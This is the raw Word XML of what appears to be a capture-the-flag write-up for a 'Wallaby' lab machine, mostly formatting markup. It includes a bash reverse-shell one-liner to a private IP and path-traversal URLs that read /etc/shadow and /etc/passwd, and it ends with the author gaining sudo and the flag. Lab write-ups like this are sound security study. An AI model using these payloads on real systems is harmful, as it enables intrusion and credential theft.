          <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BE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D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.run bash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-c 'bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/192.168.110.6/8989 0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="1952625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Picture 2" descr="WN - Wallaby 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N - Wallaby shel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Wallaby shell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It worked. Looking at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> permissions it seemed I now had all access in the world at my hands. The final part now was to find the flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5867400" cy="2295525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="WN - The fl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N - The fla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The flag! </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Done!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB32E4" w:rsidRPr="009D3BEF" w:rsidRDefault="009D3BEF" w:rsidP="009D3BEF">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00DB32E4" w:rsidRPr="009D3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FF6FD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E07C7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F04113"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B5E2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EAF"/>
    <w:rsid w:val="005943CB"/>
    <w:rsid w:val="00867464"/>
    <w:rsid w:val="009D3BEF"/>
    <w:rsid w:val="00C323FC"/>
    <w:rsid w:val="00D4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6E903E-7D2A-4CB3-A6CA-15B1771ED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47E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3B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B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EA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ost-meta">
    <w:name w:val="post-meta"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00D47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ategories">
    <w:name w:val="categories"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="post-date">
    <w:name w:val="post-date"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D47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47EA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47EAF"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47EA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E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EAF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D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="k">
    <w:name w:val="k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="se">
    <w:name w:val="se"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D47EAF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sb">
    <w:name w:val="sb"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005943CB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="009D3B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BE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D3B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4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53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51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96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33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5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0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8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21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9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4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25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8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35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22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8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04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17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00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91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43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194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0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79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72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94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0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15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0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970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7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7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09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6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82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97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31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87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04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89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60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2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13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1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34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09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87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51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01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17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9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50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17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3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9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3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8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9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02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43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4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9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3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83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7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192.168.110.11:60080/?page=../../../../../../../../../../etc/shadow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192.168.110.11:60080/?page=../../../../../../../../../../etc/passwd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://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-she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964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SLARK</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SLARK</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-24T11:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-24T11:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>